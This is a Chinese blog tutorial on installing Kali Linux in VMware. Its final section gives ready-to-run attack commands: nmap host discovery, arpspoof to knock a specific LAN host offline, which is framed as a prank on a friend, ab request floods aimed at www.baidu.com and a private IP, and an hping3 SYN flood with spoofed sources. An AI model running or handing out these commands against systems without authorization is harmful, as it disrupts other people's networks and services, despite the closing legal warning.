1、什么是 Kali

Kali 是由 Offensive Security 公司开发和维护的。它在安全领域是一家知名的、值得信赖的公司,它甚至还有一些受人尊敬的认证,来对安全从业人员做资格认证(OSCP)。

2、Kali 是为你准备的吗?

Kali 并不是为普通用户准备的,Kali 并不是个玩具,你可以使用它内置的工具去做一些会产生真实伤害的危险的事(你懂的),对于一个未受到严格教育的用户来说,做一些严重违法的事情是很容易的,并且之后你就会发现自己被陷入很无助的境地。但是,Kali 对于一个专业用户来说,它是一个极好的工具,Kali 可以做到你所希望的一切事情。

3、安装与使用

3.1、VMware的安装

就不展开说了,如果这个不会安装,后面的操作根本没法进行了,自行百度吧

3.2、Kali Linux的安装

  • 官网链接:https://www.kali.org/get-kali/#kali-installer-images
    img
  • 选择64位的iso镜像文件下载,如果你懂得BT,就选择中间的torrent种子文件下载
  • 打开虚拟机,新建虚拟机
    img
  • 新手建议安装推荐的典型安装就行,不然到时候不是没GUI界面就是少驱动程序,避免不必要的麻烦,点击下一步
    img
  • 由于kali是基于DeBian系统的,俗称“大便”系统,这里无法像CentOSUbuntu那样直接识别到,我们选择稍后安装操作系统,点击下一步
    img
  • 这里选择linux,在版本里找到DeBian 10.x 64位及以上的就行,下一步
    img
  • 这里要注意一下,这里的磁盘大小并不是说设置100G,就会立马从你磁盘空间分走100G,而是随着日常使用,累积的起来的最大值,不能超过100G,随便设置,点击下一步
    img
  • 这里点击自定义硬件,内存和处理器根据你实际的电脑配置而定,处理器可以右键我的电脑-->管理-->设备管理器-->处理器,这里显示的是线程数
  • 由于之前我们选择的是稍后安装操作系统,所以得在这里指定一下iso镜像文件
    img
  • 重要的是网络配置器,如果是在家中,ip地址不会经常变动的、网速还不错的,就可以选择桥接模式,复制网络状态,这会给虚拟机单独分配一个你当前网段的ip,后期设置静态ip更方便一些
  • 如果是在校园网,建议选择NAT模式,他会让虚拟机和你主机共用一个ip地址,这样校园网的认证就不会被挤掉了
  • 打印机可以选中,点击移除,他在后台占用的资源还比较多的
  • 接着点击完成,启动虚拟机,安装引导过程就不展示了,根据默认提示一直下一步。如果一切顺利的话,来到登录页面,账户和密码都是默认的 kali
    img

  • 进到这个界面,就代表成功了!点击左上角的黑窗口,输入:

    sudo su  切换root用户

    img

  • 第一次会提示输入密码,也就是 kali,当 $ 变成 # 的时候就代表你已经拥有至高无上的root权限了🐶紧接着我们输入:

    ifconfig  在windows里ipconfig查看ip地址

    img

  • 首先找到你的eth0网卡,因为有些安装了其他软件,有其他网卡,只看这个,inet是你虚拟机的IPV4地址,netmask是你虚拟机的子网掩码,broadcast是你虚拟机的广播地址,我们记住有效的10.163.30.123

3.3、网络攻击行为

3.3.1、ARP欺骗

  • 简单来说,就是利用广播地址,发送假ip地址,主机识别不了,就会一直等待,达到断网的效果。
  • 使用kali自带的nmap工具,嗅觉当前网段下存活(在线)的主机
nmap -v -sn 服务网关/子网掩码(如:10.163.30.1/24)
fping -asg 服务网关/子网掩码(如:10.163.30.1/24)

nmap -sn 10.163.30.1/24|grep "10.163.30"  分组过滤

以我的ip为例:10.163.30.123 服务网关就是10.163.30.1  24是固定端口
输入 nmap -v -sn 10.163.30.1/24
  • 如图所示:
    img
  • 我们可以看到网关的品牌,已下线的主机,在线的主机ip以及品牌和MAC设备地址,如果你懂的话,MAC设备地址可真是个好东西,我们就记住有效的:10.163.30.13
  • 这里有个小技巧,在linux系统里想复制粘贴的话,可以使用ctrl+shift+Cctrl+shift+V,就不会出现类似^[c这样的符号了
  • 接着输入:
arpspoof -i eth0 -t 要攻击的ip 服务网关

arpspoof -i eth0 -t 10.163.30.13 10.163.30.1

img

  • 如图所示,就代表你成功了!此时电脑右下角的网络图标并不会断网,但就是没网,你说气不气?🐶
  • 使用nmap是当你不知道对方的ip时,但你可以趁好兄弟不在,在他电脑快速敲入:xin+R-->cmd-->ipconfig记下ip地址,使用上面的命令,看你好兄弟的反应?🙃

3.3.2、cc攻击

ab -n (参数)-c (参数)网址
ab -n 1000 -c 1002 www.baidu.com

3.3.3、ab攻击

ab -n 100000 -c 100 http://172.16.10.111:5885/#/

参数一是并发数(请求的用户量)
参数二是发送总量(请求的总次数)

3.3.4、洪水攻击

hping3 -c 100000 -d 1200 -S -w 64 -p 80 --flood --rand-source 172.16.10.111

-c后面是你要形成的洪水量,比如说100000,就相当与100000个人在服务器里,于是你也就明白了DDos的原理,假设一个超市来了一群人,只看不买,道理一样。
-d后面是包大小

4、忠告

Kali学得好,监狱蹲到老,这可不是一句唬人的话。凡事三思而后行,使用不当可能会坐牢,我们还是要做个遵纪守法的好公民!

标签:操作系统网络安全Linux黑客
本文到此就结束啦
Last modification:March 25, 2024
© Allow specification reprint
如果觉得我的文章对你有用,请随意赞赏